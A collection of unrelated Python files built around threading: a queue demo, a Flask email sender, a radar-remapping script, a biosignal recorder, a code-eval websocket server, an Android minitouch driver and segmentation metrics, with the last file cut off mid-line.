threading_queues.py
from threading import Thread
from queue import Queue


def producer(queue):
    for i in range(10):
        print(str(i))
        # item = make_an_item_available(i)
        item = i
        queue.put(str(item))


def consumer(queue):
    while True:
        item = queue.get()
        print("Received item in queue from thread: " + item)
        queue.task_done()


queue = Queue()
t1 = Thread(target=producer, args=(queue, ))
t2 = Thread(target=consumer, args=(queue, ))
t1.start()
t2.start()
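As written, the consumer loops forever and the script never exits cleanly. Below is a minimal sketch of one common shutdown pattern, using a sentinel value plus queue.join(); the SENTINEL name and the fixed item count are illustrative assumptions, not part of the original script.

from threading import Thread
from queue import Queue

SENTINEL = None  # assumed marker; anything the producer never emits as real data works


def producer(queue):
    for i in range(10):
        queue.put(str(i))
    queue.put(SENTINEL)  # signal that no more items are coming


def consumer(queue):
    while True:
        item = queue.get()
        if item is SENTINEL:
            queue.task_done()
            break
        print("Received item in queue from thread: " + item)
        queue.task_done()


queue = Queue()
Thread(target=producer, args=(queue, )).start()
Thread(target=consumer, args=(queue, )).start()
queue.join()  # returns once every put() has been matched by a task_done()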
email.py
from threading import Thread

from flask import current_app, render_template
from flask_mail import Message

from . import mail


def send_email(to, subject, template, **kwargs):
    # Get app object
    app = current_app._get_current_object()
    # Compose message
    msg = Message(subject=app.config['BOOKORGANIZER_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
                  sender=app.config['BOOKORGANIZER_MAIL_SENDER'],
                  recipients=[to])
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    # Create & start thread
    thr = Thread(target=send_async_email, args=[app, msg])
    thr.start()
    return thr


def send_async_email(app, msg):
    with app.app_context():
        mail.send(msg)
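A hypothetical call site for send_email; the user object, the subject text, and the email/welcome template pair (welcome.txt / welcome.html rendered by render_template) are assumptions for illustration, not part of this module.

# inside a Flask view, after `user` has been created (illustrative names)
send_email(user.email, 'Welcome', 'email/welcome', user=user)

Because send_email returns the Thread, a caller that needs the message sent before continuing (for example, in a test) can keep the return value and join() it.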
run_radremap.py
""" This script runs the radar remapper (88d2arps) to map the polar radar data onto the ARPS grid. It takes one command-line argument, the (python) configuration file for that experiment, from which it imports the appropriate info """ import os import sys import glob import shutil import subprocess import threading from arpsenkftools.editNamelist import editNamelistFile from arpsenkftools.io_utils import import_all_from def run_remapper(command_arg_list): """Runs the radar remapper""" exe_path = command_arg_list[0] input_file_path = command_arg_list[1] output_file_path = command_arg_list[2] input_file = open(input_file_path, 'r') output_file = open(output_file_path, 'w') p = subprocess.Popen([exe_path], stdin=input_file, stdout=output_file) p.wait() print("Job {} for {} completed, return code: {}".format(exe_path, input_file_path, str(p.returncode))) input_file.close() output_file.close() # TODO: comment out this line when actually running the script. This is just to let the python # linter know about the various parameters in the config file # from arpsenkftools import master_config_default as config # import the experiment configuration file given by the first command-line argument if len(sys.argv) > 1: # Try to import user-defined config file config_file = sys.argv[1] print("Config file is " + config_file) try: config = import_all_from(config_file) print("Successfully imported experiment configuration.") except Exception: print("Unable to import experiment configuration. Exiting!") else: print("Please provide an experiment configuration file on the command line! Exiting!") # Set the path to the radremap_88D.input namelist template file radremap_input_template_path = os.path.join(config.template_exp_dir, 'radremap_88D.input') # Create the radremap work directory in icbc scratch directory if it doesn't already exist. 
radremap_work_dir = os.path.join(config.prep_work_dir, 'radremap_work') if not os.path.exists(radremap_work_dir): os.makedirs(radremap_work_dir) radar_list = config.radremap_param.pop('radar_list') # Loop through radars for radname in radar_list: # Get the list of level-2 radar data files level2_paths = glob.glob(config.radar_obs_dir + '/{}*'.format(radname)) level2_file_names = [os.path.basename(level2_path) for level2_path in level2_paths] level2_file_times = [] # Create working subdirectory for the current radar radar_work_dir = os.path.join(radremap_work_dir, radname) if not os.path.exists(radar_work_dir): os.makedirs(radar_work_dir) # Link the radarinfo.dat file if not os.path.lexists(os.path.join(radar_work_dir, 'radarinfo.dat')): os.symlink(config.template_base_dir + '/radarinfo.dat', radar_work_dir + '/radarinfo.dat') # create the list of radremap input and output file names radremap_input_file_paths = ["{}/{}.radremap_88D.input".format(radar_work_dir, level2_file_name) for level2_file_name in level2_file_names] radremap_output_file_paths = ["{}/{}.radremap_88D.output".format(radar_work_dir, level2_file_name) for level2_file_name in level2_file_names] # Create output directory for remapped radar files if it doesn't already exist if not os.path.exists(config.remapped_radar_dir): os.makedirs(config.remapped_radar_dir) # Link the radarinfo.dat file into the remapped radar directory radarinfo_link = os.path.join(config.remapped_radar_dir, config.radarinfo_file) if not os.path.exists(radarinfo_link): os.symlink(config.radarinfo_path, radarinfo_link) # Change directories to the output directory os.chdir(config.remapped_radar_dir) # Create the namelist files initime_stamp = config.initial_datetime.strftime('%Y-%m-%d.%H:%M:00') for level2_file_name, level2_path, radremap_input_file_path, radremap_output_file_path in \ zip(level2_file_names, level2_paths, radremap_input_file_paths, radremap_output_file_paths): editNamelistFile(radremap_input_template_path, radremap_input_file_path, **config.grid_param, initime=initime_stamp, inifile=config.external_inifile_path, inigbf=config.external_inigbf_path, radname=radname, radfname=level2_path, dirname=config.remapped_radar_dir + '/') # Run the radar remapper for each file count = 0 commands = [] nthreads = config.radremap_param.get('nthreads', 1) nfiles = len(level2_file_names) for i, level2_file_name, level2_path, radremap_input_file_path, radremap_output_file_path in \ zip(range(nfiles), level2_file_names, level2_paths, radremap_input_file_paths, radremap_output_file_paths): radar_time = level2_file_name[4:19] radar_time_subdir = os.path.join(config.remapped_radar_dir, radar_time) if not os.path.exists(radar_time_subdir): os.makedirs(radar_time_subdir) if count < nthreads: commands.append([config.radremap_exe_path, radremap_input_file_path, radremap_output_file_path]) count += 1 if count == nthreads or i == nfiles - 1: proc = [threading.Thread(target=run_remapper, kwargs={'command_arg_list': cmd}) for cmd in commands] [p.start() for p in proc] [p.join() for p in proc] print("Done with batch!") count = 0 commands = [] # with open(radremap_input_file_path, 'r') as input_file, \ # open(radremap_output_file_path, 'w') as output_file: # print("Running {} for {}".format(config.radremap_exe_path, radremap_input_file_path)) # subprocess.call(config.radremap_exe_path, stdin=input_file, stdout=output_file, # shell=True) # Check for auxilliary files and move them into an appropriate subdirectory refl_files = glob.glob(config.remapped_radar_dir + '/*refl*') 
if refl_files: for refl_file in refl_files: shutil.move(refl_file, radar_time_subdir) tilt_files = glob.glob(config.remapped_radar_dir + '/*tilts*') if tilt_files: for tilt_file in tilt_files: shutil.move(tilt_file, radar_time_subdir)
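The remapping loop above launches at most nthreads remapper jobs at a time and waits for each batch to finish before starting the next. Here is a stripped-down sketch of that batching pattern with a stand-in work function; the job list, the nthreads value, and the run_job body are assumptions for illustration, not the real 88d2arps invocation.

import threading


def run_job(command_arg_list):
    # stand-in for run_remapper(); the real script launches 88d2arps via subprocess
    print("running", command_arg_list)


jobs = [["remap_exe", "file_{}.input".format(i), "file_{}.output".format(i)] for i in range(7)]
nthreads = 3

batch = []
for i, job in enumerate(jobs):
    batch.append(job)
    if len(batch) == nthreads or i == len(jobs) - 1:
        threads = [threading.Thread(target=run_job, kwargs={'command_arg_list': cmd})
                   for cmd in batch]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        print("Done with batch!")
        batch = []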
recorder.py
import numpy as np import threading import queue import time from common import gtec import matplotlib.pyplot as plt from common.config import * class Recorder: def __init__( self, sample_duration=SAMPLE_DURATION, num_channels=2, channel_offset=0, signal_type="emg", ): """ Create a Recorder for EOG/EMG signals :param sample_duration: duration of sampling windows [s] :param num_channels: number of channels to record :param channel_offset: number of channels to skip :param signal_type: emg/eog """ self._stop = False self._sample_duration = sample_duration self._num_channels = num_channels self._channel_offset = channel_offset self._labels = queue.Queue() self._signal_type = signal_type self._amp = gtec.GUSBamp() self._amp.set_sampling_frequency( FS, [True for i in range(16)], None, (48, 52, FS, 4) ) self._amp.start() def start_offline_recording(self, live=True): """ Start a thread for recording. """ threading.Thread(target=self._record).start() def stop_offline_recording(self): """ Terminate the recording thread. """ self._stop = True def get_data(self): """ Get data for the duratoin of the previously defined sample_duration. """ signals, _ = self._amp.get_data() return signals def read_sample_win(self, duration=None): """ Read in a sample window. :param duration: duration to sample [s], if left out, the duration passed to the constructor will be used :return: sampled signals """ if duration is None: num_samples = int(self._sample_duration * FS) else: num_samples = int(duration * FS) sample_win = np.zeros((num_samples, self._num_channels)) # start sampling num_collected_samples = 0 sampling = True while sampling: signals, _ = self._amp.get_data() for i_sample in range(signals.shape[0]): for channel in range(self._num_channels): sample_win[num_collected_samples, channel] = signals[ i_sample, channel + self._channel_offset ] num_collected_samples += 1 if num_collected_samples == num_samples: sampling = False return sample_win def record_label(self, label): """ Queue a label to be recorded :param label: """ self._labels.put(label) def _record(self): while not self._stop: label = self._labels.get() signals = self.read_sample_win() np.savez( "training_data/{}/{}.npz".format(self._signal_type, time.time()), signals=signals, label=label.value, ) def main(): recorder = Recorder(sample_duration=6) raw_data = recorder.read_sample_win() fig = plt.figure(figsize=(12, 10)) ax2 = fig.add_subplot(2, 1, 1) ax2.set_title("Signal channel 2 - channel 1") ax2.set_xlabel("samples") ax2.set_ylabel("voltage") ax2.plot(raw_data[2 * 1200 :, 1] - raw_data[2 * 1200 :, 0]) ax2 = fig.add_subplot(2, 1, 2) ax2.set_title("Signal channel 4 - channel 3") ax2.set_xlabel("samples") ax2.set_ylabel("voltage") ax2.plot(raw_data[2 * 1200 :, 3] - raw_data[2 * 1200 :, 2]) plt.tight_layout() plt.show() if __name__ == "__main__": main()
ws_server.py
import asyncio from multiprocessing import Process import json import traceback import websockets from lively.eval import run_eval from lively.completions import get_completions from lively.code_formatting import code_format def test(): loop = asyncio.get_event_loop() start("0.0.0.0", 9942, loop) debug = True async def handle_eval(data, websocket): source = data.get("source") module_name = data.get("moduleName") if not source: await websocket.send(json.dumps({"error": "needs source"})) return if debug: print("evaluating {}".format( (source[:30] + "..." if len(source) > 30 else source).replace("\n", ""))) result = await run_eval(source, module_name, websocket) # if debug: print("eval done", result, result.json_stringify()) await websocket.send(result.json_stringify()) async def handle_completion(data, websocket): if "source" not in data: return await websocket.send(json.dumps({"error": "needs source"})) if "row" not in data: return await websocket.send(json.dumps({"error": "needs row"})) if "column" not in data: return await websocket.send(json.dumps({"error": "needs column"})) completions = await get_completions( data.get("source"), data.get("row"), data.get("column"), data.get("file") or "__workspace__.py") if debug: print("completions: {}".format(len(completions))) await websocket.send(json.dumps(completions)) async def handle_code_format(data, websocket): if "source" not in data: return await websocket.send(json.dumps({"error": "needs source"})) try: formatted_code = code_format( data.get("source"), data.get("lines"), data.get("file") or "<unknown>", data.get("style")) if debug: print("code_format done") answer = formatted_code except Exception as err: answer = json.dumps({'error': str(err)}) print(data.get("lines")) await websocket.send(json.dumps(answer)) async def handle_message(message, websocket, path): """{action, data, target}""" action = message.get("action") data = message.get("data") if not action: await websocket.send(json.dumps({"error": "message needs action"})) return if action == "eval": return await handle_eval(data, websocket) if action == "completion": return await handle_completion(data, websocket) if action == "code_format": return await handle_code_format(data, websocket) await websocket.send(json.dumps({"error": "message not understood {}".format(action)})) connections = set() async def handler(websocket, path): if debug: print("got connection") connections.add(websocket) # allow client to send itself extra data websocket.send_raw_data = lambda data: websocket.send(data) while True: try: message = await websocket.recv() except websockets.exceptions.ConnectionClosed: if debug: print("connection closed") connections.remove(websocket) break # if debug: print("got " + message) try: parsed = json.loads(message) await handle_message(parsed, websocket, path) except Exception as err: # err_str = json.dumps({"error": str(err)}) # err_str = json.dumps({"error": "\n".join(traceback.format_tb(err.__traceback__))}) err_str = json.dumps({"error": traceback.format_exc()}) print("error in handle_message: " + err_str) await websocket.send(err_str) continue # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # server start default_port = 9942 default_host = "127.0.0.1" def fix_pager(): __import__("os").environ['PAGER'] = 'cat' def start(hostname=default_host, port=default_port, loop=asyncio.get_event_loop()): fix_pager() serve = websockets.serve(handler, hostname, port) loop.run_until_complete(serve) print("server listening on {}:{}".format(hostname, port)) return serve def 
start_in_subprocess(**opts): def spawn(): loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) start(**{**opts, "loop": loop}) loop.run_forever() process = Process(target=spawn) process.start() return process if __name__ == '__main__': loop = asyncio.get_event_loop() start(loop=loop) loop.run_forever()
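A hypothetical client for the message protocol handled above; the host, port, source snippet, and moduleName value are assumptions, and the server is expected to be running already.

import asyncio
import json

import websockets


async def eval_remotely():
    async with websockets.connect("ws://127.0.0.1:9942") as ws:
        # handle_message() dispatches on "action"; handle_eval() reads "source" and "moduleName"
        await ws.send(json.dumps({
            "action": "eval",
            "data": {"source": "1 + 2", "moduleName": "__workspace__.py"},
        }))
        print(await ws.recv())


asyncio.get_event_loop().run_until_complete(eval_remotely())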
minitouch.py
# -*- coding: utf-8 -*- import os import re import socket import sys import threading import time import warnings import six from six.moves import queue from airtest.core.android.constant import STFLIB from airtest.utils.logger import get_logger from airtest.utils.nbsp import NonBlockingStreamReader from airtest.utils.safesocket import SafeSocket from airtest.utils.snippet import (get_std_encoding, on_method_ready, ready_method, reg_cleanup) LOGGING = get_logger(__name__) class Minitouch(object): """ Super fast operation from minitouch References: https://github.com/openstf/minitouch """ def __init__(self, adb, backend=False, ori_function=None): self.adb = adb self.backend = backend self.server_proc = None self.client = None self.size_info = None self.ori_function = ori_function if callable(ori_function) else self.adb.getPhysicalDisplayInfo self.max_x, self.max_y = None, None reg_cleanup(self.teardown) @ready_method def install_and_setup(self): """ Install and setup minitouch Returns: None """ self.install() self.size_info = self.ori_function() self.setup_server() if self.backend: self.setup_client_backend() else: self.setup_client() def uninstall(self): """ Uninstall minitouch Returns: None """ self.adb.raw_shell("rm /data/local/tmp/minitouch*") def install(self): """ Install minitouch Returns: None """ abi = self.adb.getprop("ro.product.cpu.abi") sdk = int(self.adb.getprop("ro.build.version.sdk")) if sdk >= 16: binfile = "minitouch" else: binfile = "minitouch-nopie" device_dir = "/data/local/tmp" path = os.path.join(STFLIB, abi, binfile).replace("\\", r"\\") if self.adb.exists_file('/data/local/tmp/minitouch'): local_minitouch_size = int(os.path.getsize(path)) try: file_size = self.adb.file_size('/data/local/tmp/minitouch') except Exception: self.uninstall() else: if local_minitouch_size == file_size: LOGGING.debug("install_minitouch skipped") return self.uninstall() self.adb.push(path, "%s/minitouch" % device_dir) self.adb.shell("chmod 755 %s/minitouch" % (device_dir)) LOGGING.info("install_minitouch finished") def __transform_xy(self, x, y): """ Transform coordinates (x, y) according to the device display Args: x: coordinate x y: coordinate y Returns: transformed coordinates (x, y) """ width, height = self.size_info['width'], self.size_info['height'] nx = x * self.max_x / width ny = y * self.max_y / height # print(nx, ny, self.max_x, self.max_y, width, height) return nx, ny def setup_server(self): """ Setip minitouch server and adb forward Returns: server process """ if self.server_proc: self.server_proc.kill() self.server_proc = None self.localport, deviceport = self.adb.setup_forward("localabstract:minitouch_{}".format) deviceport = deviceport[len("localabstract:"):] p = self.adb.start_shell("/data/local/tmp/minitouch -n '%s' 2>&1" % deviceport) nbsp = NonBlockingStreamReader(p.stdout, name="minitouch_server") while True: line = nbsp.readline(timeout=5.0) if line is None: raise RuntimeError("minitouch setup timeout") line = line.decode(get_std_encoding(sys.stdout)) # 识别出setup成功的log,并匹配出max_x, max_y m = re.match("Type \w touch device .+ \((\d+)x(\d+) with \d+ contacts\) detected on .+ \(.+\)", line) if m: self.max_x, self.max_y = int(m.group(1)), int(m.group(2)) break else: self.max_x = 32768 self.max_y = 32768 # nbsp.kill() # 保留,不杀了,后面还会继续读取并pirnt if p.poll() is not None: # server setup error, may be already setup by others # subprocess exit immediately raise RuntimeError("minitouch server quit immediately") self.server_proc = p # reg_cleanup(self.server_proc.kill) return p 
@on_method_ready('install_and_setup') def touch(self, tuple_xy, duration=0.01): """ Perform touch event minitouch protocol example:: d 0 10 10 50 c <wait in your own code> u 0 c Args: tuple_xy: coordinates (x, y) duration: time interval for touch event, default is 0.01 Returns: None """ x, y = tuple_xy x, y = self.__transform_xy(x, y) self.handle("d 0 {:.0f} {:.0f} 50\nc\n".format(x, y)) time.sleep(duration) self.handle("u 0\nc\n") def __swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5): """ Perform swipe event (without up action). minitouch protocol example:: d 0 0 0 50 c m 0 20 0 50 c m 0 40 0 50 c m 0 60 0 50 c m 0 80 0 50 c m 0 100 0 50 c u 0 c Args: tuple_from_xy: start point tuple_to_xy: end point duration: time interval for swipe duration, default is 0.8 steps: size of swipe step, default is 5 Returns: None """ from_x, from_y = tuple_from_xy to_x, to_y = tuple_to_xy from_x, from_y = self.__transform_xy(from_x, from_y) to_x, to_y = self.__transform_xy(to_x, to_y) interval = float(duration) / (steps + 1) time.sleep(interval) for i in range(1, steps): self.handle("m 0 {:.0f} {:.0f} 50\nc\n".format( from_x + (to_x - from_x) * i / steps, from_y + (to_y - from_y) * i / steps, )) time.sleep(interval) for i in range(10): self.handle("m 0 {:.0f} {:.0f} 50\nc\n".format(to_x, to_y)) time.sleep(interval) @on_method_ready('install_and_setup') def swipe_along(self, coordinates_list): """ Perform swipe event across multiple points in sequence. Args: coordinates_list: list of coordinates. Returns: None """ from_x, from_y = coordinates_list[0] self.handle("d 0 {:.0f} {:.0f} 50\nc\n".format(from_x, from_y)) for pos,tuple_from_xy in enumerate(coordinates_list): try: tuple_to_xy = coordinates_list[pos+1] except IndexError: break self.__swipe(tuple_from_xy, tuple_to_xy) self.handle("u 0\nc\n") @on_method_ready('install_and_setup') def swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5): """ Perform swipe event. 
Args: tuple_from_xy: start point tuple_to_xy: end point duration: time interval for swipe duration, default is 0.8 steps: size of swipe step, default is 5 Returns: None """ from_x, from_y = tuple_from_xy self.handle("d 0 {:.0f} {:.0f} 50\nc\n".format(from_x, from_y)) self.__swipe(tuple_from_xy, tuple_to_xy) self.handle("u 0\nc\n") @on_method_ready('install_and_setup') def two_finger_swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5): """ Perform two finger swipe action minitouch protocol example:: d 0 0 0 50 d 1 1 0 50 c m 0 20 0 50 m 1 21 0 50 c m 0 40 0 50 m 1 41 0 50 c m 0 60 0 50 m 1 61 0 50 c m 0 80 0 50 m 1 81 0 50 c m 0 100 0 50 m 1 101 0 50 c u 0 u 1 c Args: tuple_from_xy: start point tuple_to_xy: end point duration: time interval for swipe duration, default is 0.8 steps: size of swipe step, default is 5 Returns: None """ from_x, from_y = tuple_from_xy to_x, to_y = tuple_to_xy from_x, from_y = self.__transform_xy(from_x, from_y) to_x, to_y = self.__transform_xy(to_x, to_y) w = self.size_info['width'] shift_x = 1 if from_x + 1 >= w else -1 interval = float(duration) / (steps + 1) self.handle("d 0 {:.0f} {:.0f} 50\nd 1 {:.0f} {:.0f} 50\nc\n".format(from_x, from_y, from_x + shift_x, from_y)) time.sleep(interval) for i in range(1, steps): self.handle("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format( from_x + (to_x - from_x) * i / steps, from_y + (to_y - from_y) * i / steps, from_x + (to_x - from_x) * i / steps + shift_x, from_y + (to_y - from_y) * i / steps, )) time.sleep(interval) for i in range(10): self.handle("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format(to_x, to_y, to_x + shift_x, to_y)) time.sleep(interval) self.handle("u 0\nu 1\nc\n") @on_method_ready('install_and_setup') def pinch(self, center=None, percent=0.5, duration=0.5, steps=5, in_or_out='in'): """ Perform pinch action minitouch protocol example:: d 0 0 100 50 d 1 100 0 50 c m 0 10 90 50 m 1 90 10 50 c m 0 20 80 50 m 1 80 20 50 c m 0 20 80 50 m 1 80 20 50 c m 0 30 70 50 m 1 70 30 50 c m 0 40 60 50 m 1 60 40 50 c m 0 50 50 50 m 1 50 50 50 c u 0 u 1 c """ w, h = self.size_info['width'], self.size_info['height'] if isinstance(center, (list, tuple)): x0, y0 = center elif center is None: x0, y0 = w / 2, h / 2 else: raise RuntimeError("center should be None or list/tuple, not %s" % repr(center)) x1, y1 = x0 - w * percent / 2, y0 - h * percent / 2 x2, y2 = x0 + w * percent / 2, y0 + h * percent / 2 cmds = [] if in_or_out == 'in': cmds.append("d 0 {:.0f} {:.0f} 50\nd 1 {:.0f} {:.0f} 50\nc\n".format(x1, y1, x2, y2)) for i in range(1, steps): cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format( x1+(x0-x1)*i/steps, y1+(y0-y1)*i/steps, x2+(x0-x2)*i/steps, y2+(y0-y2)*i/steps )) cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format(x0, y0, x0, y0)) cmds.append("u 0\nu 1\nc\n") elif in_or_out == 'out': cmds.append("d 0 {:.0f} {:.0f} 50\nd 1 {:.0f} {:.0f} 50\nc\n".format(x0, y0, x0, y0)) for i in range(1, steps): cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format( x0+(x1-x0)*i/steps, y0+(y1-y0)*i/steps, x0+(x2-x0)*i/steps, y0+(y2-y0)*i/steps )) cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format(x1, y1, x2, y2)) cmds.append("u 0\nu 1\nc\n") else: raise RuntimeError("center should be 'in' or 'out', not {}".format(repr(in_or_out))) interval = float(duration) / (steps + 1) for i, c in enumerate(cmds): self.handle(c) time.sleep(interval) @on_method_ready('install_and_setup') def operate(self, args): """ Perform down, up and move actions Args: 
args: action arguments, dictionary containing type and x, y coordinates, e.g.:: { "type" : "down", "x" : 10, "y" : 10 } Raises: RuntimeError: is invalid arguments are provided Returns: None """ if args["type"] == "down": x, y = self.__transform_xy(args["x"], args["y"]) # support py 3 cmd = "d 0 {:.0f} {:.0f} 50\nc\n".format(x, y) elif args["type"] == "move": x, y = self.__transform_xy(args["x"], args["y"]) # support py 3 cmd = "m 0 {:.0f} {:.0f} 50\nc\n".format(x, y) elif args["type"] == "up": # support py 3 cmd = "u 0\nc\n" else: raise RuntimeError("invalid operate args: {}".format(args)) self.handle(cmd) @on_method_ready('install_and_setup') def perform(self, motion_events, interval=0.01): """ Perform a sequence of motion events including: UpEvent, DownEvent, MoveEvent, SleepEvent :param motion_events: a list of MotionEvent instances :param interval: minimum interval between events :return: None """ for event in motion_events: if isinstance(event, SleepEvent): time.sleep(event.seconds) else: cmd = event.getcmd(transform=self.__transform_xy) self.handle(cmd) time.sleep(interval) def safe_send(self, data): """ Send data to client Args: data: data to send Raises: Exception: when data cannot be sent Returns: None """ if isinstance(data, six.text_type): data = data.encode('utf-8') try: self.client.send(data) except Exception as err: # raise MinitouchError(err) raise err def _backend_worker(self): """ Backend worker queue thread Returns: None """ while not self.backend_stop_event.isSet(): cmd = self.backend_queue.get() if cmd is None: break self.safe_send(cmd) def setup_client_backend(self): """ Setup backend client thread as daemon Returns: None """ self.backend_queue = queue.Queue() self.backend_stop_event = threading.Event() self.setup_client() t = threading.Thread(target=self._backend_worker, name="minitouch") # t.daemon = True t.start() self.backend_thread = t self.handle = self.backend_queue.put def setup_client(self): """ Setup client in following steps:: 1. connect to server 2. receive the header v <version> ^ <max-contacts> <max-x> <max-y> <max-pressure> $ <pid> 3. 
prepare to send Returns: None """ s = SafeSocket() s.connect((self.adb.host, self.localport)) s.sock.settimeout(2) header = b"" while True: try: header += s.sock.recv(4096) # size is not strict, so use raw socket.recv except socket.timeout: # raise RuntimeError("minitouch setup client error") warnings.warn("minitouch header not recved") break if header.count(b'\n') >= 3: break LOGGING.debug("minitouch header:%s", repr(header)) self.client = s self.handle = self.safe_send def teardown(self): """ Stop the server and client Returns: None """ if hasattr(self, "backend_stop_event"): self.backend_stop_event.set() self.backend_queue.put(None) if self.client: self.client.close() if self.server_proc: self.server_proc.kill() class MotionEvent(object): """ Motion Event to be performed by Minitouch """ def getcmd(self, transform=None): raise NotImplementedError class DownEvent(MotionEvent): def __init__(self, coordinates, contact=0, pressure=50): """ Finger Down Event :param coordinates: finger down coordinates in (x, y) :param contact: multi-touch action, starts from 0 :param pressure: touch pressure """ super(DownEvent, self).__init__() self.coordinates = coordinates self.contact = contact self.pressure = pressure def getcmd(self, transform=None): if transform: x, y = transform(*self.coordinates) else: x, y = self.coordinates cmd = "d {:.0f} {:.0f} {:.0f} {:.0f}\nc\n".format(self.contact, x, y, self.pressure) return cmd class UpEvent(MotionEvent): def __init__(self, contact=0): """ Finger Up Event :param contact: multi-touch action, starts from 0 """ super(UpEvent, self).__init__() self.contact = contact def getcmd(self, transform=None): cmd = "u {:.0f}\nc\n".format(self.contact) return cmd class MoveEvent(MotionEvent): def __init__(self, coordinates, contact=0, pressure=50): """ Finger Move Event :param coordinates: finger move to coordinates in (x, y) :param contact: multi-touch action, starts from 0 :param pressure: touch pressure """ super(MoveEvent, self).__init__() self.coordinates = coordinates self.contact = contact self.pressure = pressure def getcmd(self, transform=None): if transform: x, y = transform(*self.coordinates) else: x, y = self.coordinates cmd = "m {:.0f} {:.0f} {:.0f} {:.0f}\nc\n".format(self.contact, x, y, self.pressure) return cmd class SleepEvent(MotionEvent): def __init__(self, seconds): self.seconds = seconds def getcmd(self, transform=None): return None
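The MotionEvent subclasses at the end pair with Minitouch.perform(). A hypothetical gesture built from them might look like the sketch below; the adb handle is assumed to be an already-initialized airtest ADB object for a connected device, and install_and_setup() is triggered lazily by the @on_method_ready decorator on perform().

# `adb` is an assumed, already-initialized airtest ADB object
minitouch = Minitouch(adb)
minitouch.perform([
    DownEvent((100, 200)),  # finger down
    SleepEvent(0.5),        # hold for half a second
    MoveEvent((400, 200)),  # drag to the right
    UpEvent(),              # lift the finger
])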
metrics.py
import numpy as np from skimage.metrics import contingency_table from skimage.metrics import variation_of_information, adapted_rand_error import threading def precision(tp, fp, fn): return tp / (tp + fp) if tp > 0 else 0 def recall(tp, fp, fn): return tp / (tp + fn) if tp > 0 else 0 def accuracy(tp, fp, fn): return tp / (tp + fp + fn) if tp > 0 else 0 def f1(tp, fp, fn): return (2 * tp) / (2 * tp + fp + fn) if tp > 0 else 0 def _relabel(input): _, unique_labels = np.unique(input, return_inverse=True) return unique_labels.reshape(input.shape) def _iou_matrix(gt, seg): # relabel gt and seg for smaller memory footprint of contingency table gt = _relabel(gt) seg = _relabel(seg) # get number of overlapping pixels between GT and SEG n_inter = contingency_table(gt, seg).A # number of pixels for GT instances n_gt = n_inter.sum(axis=1, keepdims=True) # number of pixels for SEG instances n_seg = n_inter.sum(axis=0, keepdims=True) # number of pixels in the union between GT and SEG instances n_union = n_gt + n_seg - n_inter iou_matrix = n_inter / n_union # make sure that the values are within [0,1] range assert 0 <= np.min(iou_matrix) <= np.max(iou_matrix) <= 1 return iou_matrix class SegmentationMetrics: """ Computes precision, recall, accuracy, f1 score for a given ground truth and predicted segmentation. Contingency table for a given ground truth and predicted segmentation is computed eagerly upon construction of the instance of `SegmentationMetrics`. Args: gt (ndarray): ground truth segmentation seg (ndarray): predicted segmentation """ def __init__(self, gt, seg): self.iou_matrix = _iou_matrix(gt, seg) def metrics(self, iou_threshold): """ Computes precision, recall, accuracy, f1 score at a given IoU threshold """ # ignore background iou_matrix = self.iou_matrix[1:, 1:] detection_matrix = (iou_matrix > iou_threshold).astype(np.uint8) n_gt, n_seg = detection_matrix.shape # if the iou_matrix is empty or all values are 0 trivial = min(n_gt, n_seg) == 0 or np.all(detection_matrix == 0) if trivial: tp = fp = fn = 0 else: # count non-zero rows to get the number of TP tp = np.count_nonzero(detection_matrix.sum(axis=1)) # count zero rows to get the number of FN fn = n_gt - tp # count zero columns to get the number of FP fp = n_seg - np.count_nonzero(detection_matrix.sum(axis=0)) return { 'precision': precision(tp, fp, fn), 'recall': recall(tp, fp, fn), 'accuracy': accuracy(tp, fp, fn), 'f1': f1(tp, fp, fn) } class AveragePrecision: """ Average precision taken for the IoU range (0.5, 0.95) with a step of 0.05 as defined in: https://www.kaggle.com/stkbailey/step-by-step-explanation-of-scoring-metric """ def __init__(self, iou=None): if iou is not None: self.iou_range = [iou] else: self.iou_range = np.linspace(0.50, 0.95, 10) def __call__(self, input_seg, gt_seg): if len(np.unique(gt_seg)) == 1: return 1. 
# compute contingency_table sm = SegmentationMetrics(gt_seg, input_seg) # compute accuracy for each threshold acc = [sm.metrics(iou)['accuracy'] for iou in self.iou_range] # return the average return np.mean(acc) class ClusterMetrics: def __init__(self): self.splits_scores = [] self.merges_scores = [] self.are_score = [] self.arp_score = [] self.arr_score = [] def reset(self): self.splits_scores = [] self.merges_scores = [] self.are_score = [] self.arp_score = [] self.arr_score = [] def __call__(self, input_seg, gt_seg): splits, merges = variation_of_information(gt_seg, input_seg) self.splits_scores.append(splits) self.merges_scores.append(merges) are, arp, arr = adapted_rand_error(gt_seg, input_seg) self.are_score.append(are) self.arp_score.append(arp) self.arr_score.append(arr) def dump(self): return np.mean(self.splits_scores), np.mean(self.merges_scores), \ np.mean(self.are_score), np.mean(self.arp_score), \ np.mean(self.arr_score) def dump_std(self): return np.std(self.splits_scores), np.std(self.merges_scores), \ np.std(self.are_score), np.std(self.arp_score), \ np.std(self.arr_score) import numpy as np def dic(gt, seg): n_gt = len(np.setdiff1d(np.unique(gt), [0])) n_seg = len(np.setdiff1d(np.unique(seg), [0])) return np.abs(n_gt - n_seg) def dice_score(gt, seg, smooth = 1.): gt = gt > 0 seg = seg > 0 nom = 2 * np.sum(gt * seg) denom = np.sum(gt) + np.sum(seg) dice = float(nom + smooth) / float(denom + smooth) return dice class DiceScore: def __call__(self, gt, seg, smooth = 1.): return dice_score(gt, seg) def best_dice(gt, seg): gt_lables = np.setdiff1d(np.unique(gt), [0]) seg_labels = np.setdiff1d(np.unique(seg), [0]) best_dices = [] def dice(gt_idx): _gt_seg = 